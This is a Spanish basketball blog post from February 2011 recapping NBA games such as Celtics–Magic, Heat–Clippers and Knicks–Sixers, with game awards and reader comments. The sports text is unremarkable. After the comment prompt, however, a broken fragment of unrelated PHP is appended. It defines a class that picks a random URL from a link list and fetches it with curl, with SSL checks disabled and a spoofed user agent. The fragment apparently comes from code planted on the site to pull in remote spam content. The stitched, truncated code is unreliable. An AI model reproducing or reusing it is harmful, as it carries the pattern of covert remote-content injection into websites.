La Crónica (06/02/2011)

07 de February de 2011 por TheDeerHunter

Demasiado fácil. No hemos visto un sólo partido de los Celtics con todos sus efectivos juntos pero dan la sensación de pasearse ante todos sus rivales. Ayer no fue una excepción (80-91). Tuvimos un dejà vú viendo a Rondo marcar diferencias sobre Nelson y al sistema de Doc sobre Howard, asfixiando a los Magic alrededor suyo conforme fue avanzando el choque. Esto será lo que les espera a Orlando en los cruces y, si no nos sorprenden a todos o incluso a ellos mismos, éste será el resultado. Si no ocurre nada raro, su techo está en la eliminatoria contra los Celtics, como quizás también lo sea para el resto de los equipos.

Por su parte los Heat aguardan agazapados. En uno de los peores partidos de LeBron del año le colaron una ventaja de 20 a unos Clippers en buena forma (79-97). Con Bosh renqueante, Wade usó galones para rozar el triple doble. Además hay noticias de Haslem, quien comienza ahora la rehabilitación para volver, según él, en marzo como muy tarde.

Stoudemire le devolvió el golpe a Elton Brand en el Madison y con un sensacional Landry Fields doblegaron a los Sixers (103-117). Por su parte, en Indiana siguen inmersos en la racha victoriosa de la era Vogel (105-86). El mejor fue Dahntay Jones a quién pedíamos hace unas semanas.

PREMIOS

MVP: 41 puntos de Amare Stoudamire con 17 de 21 en tiros de campo. Y además 7 rebotes, 4 asistencias y 4 tapones para 50 puntos de eficiencia. Brutal, brutal, brutal…

Rookie: Volvió a lo grande Landry Fields con 25 puntos (10 de 13) y 10 rebotes. Aunque esté pasando una época difícil es, sin duda, el robo del draft no ya de esta temporada sinó de los últimos años. Hoy ha superado al mismísimo Blake Griffin que “se quedó” en 21 puntos y 16 rebotes.

Sorpresa: El año pasado fue una de las sorpresas agradables de Indiana pero este no contaba apenas con minutos. Con el cambio de entrenador parece que Danthay Jones vuelve a gozar de oportunidades como la de ayer, perfectamente aprovechada con 18 puntos y 4 rebotes.

Decepción: El banquillo de los Magic se combinó para anotar 7 de 30 lanzamientos. Mención especial al 0 de 7 de Gilbert Arenas.

Esfuerzo en vano: Ayer mismo apostaba Love Denise por Dwight Howard como mayor esfuerzo en vano de la jornada y no se equivocaba. Buen partido de 28 puntos y 13 rebotes totalmente intrascendente para el resultado final (más allá de no recibir una paliza).

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Pues de ayer vi el Celtics-Magic. Como dice la crónica los Celtics ahogaron la producción de los Magic menos Howard en el primer tiempo y en el segundo cerraron el tema en cuanto Dwight no pudo llevar el sólo el ataque de Orlando. Rondo vio que los Magic iban a tratar de no defenderle a él sino a los demás y se fue a 26 puntos demostrando ser demasiado rápido para Nelson y no digamos ya para Arenas. Los Celtics parecieron ganar con total facilidad y a pesar de que los Magic se mantenían a 10 puntos más o menos nunca dieron la impresión de poder remontar. Buena forma para los verdes de resarcirse del partido que dejaron escapar ante Dallas y una nueva muestra de que ahora mismo Orlando parece lejos del nivel para luchar por el anillo

      Citar

  2. Viva_Dirk dice:
    #2

    Los Magic desde que jugaron la final contra Lakers no han dado una a derechas, han hecho siempre movimientos de medio pelo y no han solucionado los problemas que tenian. Van Gundy es un entrenador mediocre para un aspirante al título que cuando se enfrenta con un mito como Phil Jackson o un tremendo estratega como Rivers no sabe reaccionar.

    Para colmo tienen a Arenas pasado de peso y con un contrato monstruoso, que el de Lewis no es moco de pavo, pero al menos el tio era mínimamente honrado y creo que al menos podria haber llevado algo que no reste al equipo.

      Citar

  3. MagicJohnson32 dice:
    #3

    Es que Nelson es uno de los peores defensores en su posición de toda la liga. Otro problema para los Magic, y ya van…

      Citar

  4. HisRoyalAirness dice:
    #4

    Yo apostaría por Arenas con muchos minutos algunos partidos. En serio. Que deje Turkoglu de hacer de playmaker y de tirarse mandarinas desde la línea de 3 y que lo ponga de small forward y a J Rich de 2. Creo que un quinteto Arenas, Richardson, Turkoglu, Bass y Howard puede funcionar muy bien pero hay que darle minutos y dejar de hacer las rotaciones de mierda que hace Van Gundy. Sé que me vais a poner a parir por decir que tiene que jugar Arenas pero es igual o mejor anotador que Nelson, en forma mejor defensor y mucho mejor distribuidor. Un equipo que se sustenta en un pivot dominante y el tiro exterior no puede tener un base que no distribuya con criterio. Y el pick & roll con Howard debería ser ley.

      Citar

  5. sergio dice:
    #5

    El problema d ls Magic es Su incapacidad defensiva, Su dependencia del tiro exterior y su falta d carácter.
    Nelson no ha exo más q empeorar dsd su Allstar. Dwight Howard se ha multiplicado aras semanas,y más que una buena noticia se ha convertido en lo único salvable. Ya no sólo los Celtics, sino Bulls y Heartburn pueden destrozarlos n PO

      Citar

  6. Denise dice:
    #6

    Desde mi punto de vista, el problema más grave de los Magic no es ni su defensa, ni Van Gundy; su principal problema es que está plagado de jugadores tremendamente irregulares como Turkoglu, Redick, Jason Richardson y Arenas. Lo mas consistente ahora mismo que tienen son Superman y Bass.
    Cuando los irregulares están enchufados, los Magic son un equipo dificilisimo de batir, pero es dificil encontrar un día donde todos tengan el dia bueno, y más dificil aun (por no decir imposible), jugar una serie con todos enchufados.
    Acerté el mayor esguerzo en vano de hoy, y voy a hacer otra predicción. Esta noche ganan los Cavs en Dalllas…

      Citar

  7. Busky23 dice:
    #7

    Yo estoy con Denise,el perímetro es muy muy irregular,ayer 8 de 31 entre el turco,Redick,Richardson y Arenas,inaceptable.
    Como inaceptable era ver al Turkoglu este tirarse unas mandarinas sin venir a cuento que era para mandarlo a su casa pero a la de Turquía.
    Ayer volvió a quedar claro 1- que Boston si sus pilares están sanos no hay equipo en el Este que pueda con ellos a 7 partidos y 2- Orlando es más de lo mismo que antes del traspaso,los mismos perros con diferentes collares.

    Como apunte morboso seria genial que Allen batiera el récord de triples el jueves,contra Lakers,en partido televisado para todo el país y de comentarista… Reggie Miller!

      Citar

  8. sergio dice:
    #8

    Esto de escribir los comentarios desde el movil y con el T9 es una pena…. no me entero ni yo de lo que queria escribir xD

    Denise, yo salvaria a otro en los Magic: Ryan Anderson

      Citar

  9. Denise dice:
    #9

    Si, a aAnderson tambien lo salvo, sobre todo su actitud, y le admiro que no le haya pegado un buen bofetazo en todo el bigote a V gundy por tenerlo aburrido en el banco el año pasado. Pero su juego ofensivo depende tambien de su tiro exterior, pero venga, le perdono la vida XD….

      Citar

  10. Denise dice:
    #10

      Citar

  11. sergio dice:
    #11

    Permitidme la licencia de recomendaros este libro de Jabbar sobre los Rens de Harlem. Ahora que Kareem ha salido de su particular calvario es bueno conocer a ese equipo que tanto influyó en su forma de ver el baloncesto y la sociedad. Si lo encuentro en PDF lo volveré a poner si me permitís. Eso si, solo para gente que maneje bien el inglés.

    http://www.amazon.com/Shoulders-Giants-Journey-Through-Renaissance/dp/1416534881

      Citar

  12. sayim dice:
    #12

    Denise, aun no me explico como me has convencido: me acabo de jugar 5 eurillos a la victoria de Cavs ante Mavs. Se paga 13.5 a 1, si tienes razón ya me da para una buena juerga…

      Citar

  13. Denise dice:
    #13

    Pues lo siento pero han perdido los Cavs….pero por solo 3 puntos. He estado cerca de acertar. Una dudosa falta en ataque pitada a Cavs (que facil es pitar contra los Cavs, eh arbitros!!), y un triple fallado por Parker a 3 segundos del final han hecho que los Cavs perdiesen, y para colmo cogen el rebote ofensivo y no tiran….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>